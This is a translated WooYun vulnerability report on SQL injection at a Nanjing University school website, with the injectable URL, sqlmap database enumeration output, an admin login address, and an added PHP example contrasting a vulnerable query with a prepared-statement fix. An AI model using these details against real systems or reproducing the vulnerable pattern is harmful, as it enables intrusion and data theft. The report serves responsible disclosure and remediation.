Vulnerability summary

Defect ID: wooyun-2015-0114938

Title: SQL injection in the School of Management and Engineering, Nanjing University (leaks database information)

Related vendor: nju.edu.cn

Author: 尊-折戟

Submitted: 2015-05-19 16:04

Fixed: 2015-07-03 16:28

Published: 2015-07-03 16:28

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 7

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-05-19: Details sent to the vendor, awaiting vendor handling
2015-05-19: Vendor confirmed; details disclosed to the vendor only
2015-05-29: Details disclosed to core white hats and domain experts
2015-06-08: Details disclosed to regular white hats
2015-06-18: Details disclosed to intern white hats
2015-07-03: Details disclosed to the public

Brief description:

SQL injection at the School of Management and Engineering, Nanjing University, leaking some personnel information

Detailed description:

Injection point:

http://sme.nju.edu.cn/content/news_detail.php?id=89


Ran it straight through sqlmap, which returned the server OS and the database privileges.

Didn't expect this many privileges!
Dumping the database and table names gives the following:

---
[13:41:47] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.4.19
back-end DBMS: MySQL 5.0.12
[13:41:47] [INFO] fetching database names
[13:41:47] [INFO] the SQL query used returns 9 entries
[13:41:47] [INFO] resumed: information_schema
[13:41:47] [INFO] resumed: cdcol
[13:41:47] [INFO] resumed: mysql
[13:41:47] [INFO] resumed: performance_schema
[13:41:47] [INFO] resumed: phpmyadmin
[13:41:47] [INFO] resumed: smee
[13:41:47] [INFO] resumed: test
[13:41:47] [INFO] resumed: webauth
[13:41:48] [INFO] resumed: yuhonghai
[13:41:48] [INFO] fetching tables for databases: 'cdcol, informati
ma, phpmyadmin, smee, test, webauth, yuhonghai'
[13:41:48] [INFO] the SQL query used returns 154 entries


Looking at the data, I found...



A leak this serious...
Finally, a look at the users.

This is the admin backend address:

http://sme.nju.edu.cn/content/admin/sem_user/admin_php/Login.php


Whatever I might do with it, it can be logged into, but it's better not to damage the teaching system...
That's all!

Proof of vulnerability:

(screenshots of the sqlmap runs, not reproduced here)

Fix recommendation:

Filter keywords and use SafeDog to block special characters!
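Keyword filtering and a WAF only narrow what an attacker can send; the root cause is the id parameter being built into the SQL string. The following is an added illustration, not the site's own code: a hypothetical reconstruction of the news_detail.php?id= pattern next to its hardened form, written for the PHP 5.4 / mysqli stack named in the sqlmap output, with the table name t_news assumed from the database listing.

```php
<?php
// Added illustration, not the site's code: a hypothetical reconstruction of the
// news_detail.php?id= pattern, written for PHP 5.4 / mysqli as listed on the page.
// The table name t_news is an assumption taken from the database listing.

// Vulnerable form: the raw id parameter is concatenated into the SQL string,
// which is what lets a single GET parameter be used to enumerate databases.
function fetch_news_vulnerable(mysqli $db, array $get)
{
    $id  = isset($get['id']) ? $get['id'] : '';
    $sql = "SELECT id, title, body FROM t_news WHERE id = " . $id; // injectable
    $res = $db->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// Hardened form: enforce the expected type first, then bind the value as a
// query parameter so it is never parsed as SQL. No WAF or keyword list needed.
function fetch_news_safe(mysqli $db, array $get)
{
    $id = filter_var(isset($get['id']) ? $get['id'] : null, FILTER_VALIDATE_INT,
                     array('options' => array('min_range' => 1)));
    if ($id === false) {
        http_response_code(400); // reject anything that is not a positive integer
        return null;
    }
    $stmt = $db->prepare("SELECT id, title, body FROM t_news WHERE id = ?");
    if ($stmt === false) {
        return null; // prepare failed; do not fall back to string building
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($rowId, $title, $body);
    $row = $stmt->fetch()
        ? array('id' => $rowId, 'title' => $title, 'body' => $body)
        : null;
    $stmt->close();
    return $row;
}
```

Pair this with a least-privilege database account that has only SELECT on the tables the site needs; the report shows the web application's account could read the mysql, webauth and phpmyadmin schemas, which turned one injectable parameter into a full credential leak.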

Copyright notice: please credit the source when reposting: 尊-折戟@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-05-19 16:27

Vendor reply:

We will notify the relevant departments to handle it.

Latest status:

None yet